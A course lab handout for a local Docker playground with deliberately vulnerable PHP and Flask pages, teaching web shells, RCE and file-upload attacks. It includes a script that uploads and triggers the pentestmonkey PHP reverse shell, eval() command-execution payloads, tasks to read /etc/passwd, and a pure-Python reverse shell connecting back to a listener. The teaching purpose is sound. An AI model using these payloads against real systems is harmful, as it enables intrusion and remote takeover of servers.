
Web Based Shell Playground

Our second set of lab tasks is based around web based shells.

The Web Shell playground has both PHP and Python based web servers for you to practice using web shells and RCE.

# cd to wherever you cloned the course repository
$ cd <github>

$ cd week2/WebShellPlayground
$ docker-compose up

You will now have a:

  • PHP based server on port 80
  • Python / Flask server on port 5000

Activity 1: PHP Based shells

For this task you will want to use the PHP based server on port 80 (http://localhost).

PHP Shell Playground

Simple task

The first two links let you try out "preinstalled" versions of the p0wny shell and the pentestmonkey reverse shell.

They should give you a feel for how the two approaches differ and what each is capable of: p0wny is a web shell you drive from the browser (every command is an HTTP request to the uploaded page), whereas pentestmonkey's php-reverse-shell connects back to a listener on your machine and hands you an interactive shell there.

The RCE pages look at simple remote code execution flaws. Each page lets you run commands via the form input, with no input sanitisation to get in the way.

There are two versions of the RCE page

  • RCE: this version of the page triggers the RCE via PHP's system() function, which prints the command's output into the response, so you can see it.

  • Blind RCE: here the command runs via exec(). It still executes, but, unlike system(), exec() does not print the output, so the page shows you nothing. While this can be a pain, there are a couple of ways around it [1]. Do a bit of research and see what solutions you can come up with.

Task

Try both of the RCE methods to get a feel for how they work. I suggest doing the following:

  • Execute a system command (for example id)
  • Read a file (for example /etc/passwd)
  • Write to a file
  • Use RCE to get a netcat remote shell

Hard task

Typing commands into a URL or form is tiresome. Create a simple Python script that interacts with the server for you.

For bonus points, get it to download a shell from your machine and execute it.

Activity 2: PHP Based file upload

The final thing to try on our PHP based system is getting a reverse shell via file upload.

There is no input sanitisation to get in your way, so all you have to do is upload the file, then request it from the /uploads/ directory. For the reverse shell, start your listener before you request the file.

Task

Get a shell through file upload.

  • Try both the p0wny and pentestmonkey shells
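The upload route end to end, as an added example rather than the lab's code: patch the pentestmonkey shell's callback address, build the multipart request by hand, upload, then request the file. The upload URL, the file field name and the listener address are assumptions (the page gives none of them); the two `$ip` / `$port` lines marked "CHANGE THIS" really are in pentestmonkey's php-reverse-shell.php, and SAMPLE_SHELL is a constructed stand-in containing just those lines so the script runs without the real file.

```python
#!/usr/bin/env python3
"""Upload a patched pentestmonkey reverse shell and trigger it.

Added example, not the lab's code. Assumed (not on the page): the form is at
http://localhost/upload.php, its file input is named "file", and uploads are
served back at http://localhost/uploads/<filename>.
"""
import re
import secrets
import sys
import urllib.request

UPLOAD_URL = "http://localhost/upload.php"     # assumed
FILE_FIELD = "file"                            # assumed
LHOST, LPORT = "10.0.0.1", 4444                # assumed listener: nc -lvnp 4444

# Constructed stand-in for php-reverse-shell.php: only the two lines that matter.
SAMPLE_SHELL = (
    "<?php\n"
    "$ip = '127.0.0.1';  // CHANGE THIS\n"
    "$port = 1234;       // CHANGE THIS\n"
    "// ... rest of pentestmonkey's shell ...\n"
)


def patch_callback(src, lhost, lport):
    """Point the shell at your listener. p0wny needs no such change: you drive
    it from the browser instead of it connecting back to you."""
    src = re.sub(r"\$ip\s*=\s*'[^']*';", f"$ip = '{lhost}';", src, count=1)
    src = re.sub(r"\$port\s*=\s*\d+;", f"$port = {lport};", src, count=1)
    return src


def multipart_body(field, filename, content, boundary):
    """Hand-rolled multipart/form-data so no third-party HTTP library is needed."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    return head + content + f"\r\n--{boundary}--\r\n".encode()


def upload(content, filename, url=UPLOAD_URL, field=FILE_FIELD):
    """POST the file; returns the HTTP status code."""
    boundary = "----" + secrets.token_hex(16)
    body = multipart_body(field, filename, content, boundary)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.status


def trigger(filename, base="http://localhost/uploads/"):
    """Request the uploaded file. The reverse shell holds the request open for
    as long as the shell lives, so a timeout here is the expected outcome; the
    shell itself shows up on the netcat listener, not in this response."""
    try:
        urllib.request.urlopen(base + filename, timeout=5).read()
    except Exception as exc:  # timeout or connection drop once the shell is up
        print(f"request to {filename} ended: {exc}")


if __name__ == "__main__":
    # usage: upload_shell.py [path/to/php-reverse-shell.php]
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SHELL
    name = "rs_" + secrets.token_hex(4) + ".php"
    print("upload status:", upload(patch_callback(src, LHOST, LPORT).encode(), name))
    trigger(name)  # have `nc -lvnp 4444` running before this line
```

LHOST must be your machine's address as seen from inside the container, not 127.0.0.1 (which, inside the container, is the container itself); the Docker bridge address or your LAN address is what you want.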

Activity 3: Python based RCE

In the Python shell playground (http://127.0.0.1:5000) there are two different types of RCE for you to play with.

The first is subprocess based. It is reasonably straightforward, as you can run system commands in the same way as with PHP.

Easy task

Try the subprocess based RCE in Python to get a feel for how it works. I suggest doing the following:

  • Execute a system command (for example id)
  • Read a file (for example /etc/passwd)
  • Write to a file
  • Use RCE to get a netcat remote shell

Our second challenge uses eval() to execute the code. This is a bit more of a challenge: eval() evaluates a single expression, and whether you see anything depends on what that expression evaluates to. os.system('id'), for instance, runs the command but evaluates to its exit status, so the output never reaches the response. It will be good practice for SSTI and Python sandbox escapes though :p

Task

Try the Eval based Python RCE.

First you should try to find a way of getting some meaningful output. As you have access to the docker logs (docker-compose logs -f), which will usually show the output of the commands, you can use those to check that your commands are running in the background.

  • Execute a system command (for example id)
  • Read a file (for example /etc/passwd)
  • Write to a file
  • Use RCE to get a netcat remote shell

Hard task

Try to get a reverse shell written purely in Python (no netcat on the target) using the eval approach.
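The eval task and the hard task side by side, as an added example (not the playground's code). `vulnerable_sink()` stands in for the Flask handler, which is assumed to eval() the submitted string and show whatever it evaluates to; that assumption is what the "no output" behaviour described above hinges on. The payloads run locally with harmless commands, and the reverse-shell payload is only built as a string, never executed.

```python
#!/usr/bin/env python3
"""What an eval()-based page hands back for different payloads.

Added example, not the lab's code. vulnerable_sink() is an assumed stand-in
for the Flask handler: eval() the input, return the resulting value.
"""


def vulnerable_sink(user_input):
    """Deliberately unsafe stand-in for the lab's eval page."""
    return eval(user_input)


# Runs 'echo hi' but evaluates to the exit status (0): the page shows "0" and
# the text goes to the server's stdout, which is why it turns up in docker logs.
SYSTEM_PAYLOAD = "__import__('os').system('echo hi')"

# Evaluates to the command's stdout, so the page can show it.
OUTPUT_PAYLOAD = "__import__('subprocess').check_output(['echo', 'hi']).decode()"

# Same idea without subprocess, handy when that name is filtered.
POPEN_PAYLOAD = "__import__('os').popen('echo hi').read()"


def read_file_payload(path):
    """Read a file: the expression evaluates to the file's contents."""
    return f"open({path!r}).read()"


def write_file_payload(path, text):
    """Write a file: eval() only accepts an expression, so chain the write
    onto open(); the value you get back is the number of characters written."""
    return f"open({path!r}, 'w').write({text!r})"


def exec_payload(script):
    """Imports, loops and assignments are statements, which eval() rejects,
    but exec() is an ordinary function call, so a whole script fits inside
    one expression (it evaluates to None, so expect an empty page)."""
    return f"exec({script!r})"


# Pure-Python reverse shell for the hard task: nothing but the interpreter
# and /bin/sh is needed on the target.
REVERSE_SHELL = (
    "import os, socket, subprocess\n"
    "s = socket.socket()\n"
    "s.connect(('{host}', {port}))\n"
    "for fd in (0, 1, 2):\n"
    "    os.dup2(s.fileno(), fd)\n"
    "subprocess.call(['/bin/sh', '-i'])\n"
)


def reverse_shell_payload(host, port):
    """Start `nc -lvnp <port>` on your machine, then submit this string."""
    return exec_payload(REVERSE_SHELL.format(host=host, port=port))


if __name__ == "__main__":
    for label, payload in [("system", SYSTEM_PAYLOAD),
                           ("check_output", OUTPUT_PAYLOAD),
                           ("popen", POPEN_PAYLOAD)]:
        print(f"{label}: {vulnerable_sink(payload)!r}")
    # 10.0.0.1:4444 is an assumed listener address; nothing below connects anywhere.
    print(reverse_shell_payload("10.0.0.1", 4444))
```

The same expression-only constraint is why Jinja2 SSTI payloads look the way they do, so the habits formed here (reach a module through `__import__` or an attribute chain, make the expression evaluate to the thing you want to read) carry over directly.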


  1. Obviously you will need to "pretend" you don't know anything about the system here. It might be tempting to cheat, but that's not going to help if you hit this in the real world [2]. Try replicating the same enumeration process you would use for an RCE that shows its output, and use it to find which commands are available.

  2. Also, I don't like people who cheat, as you might have guessed.
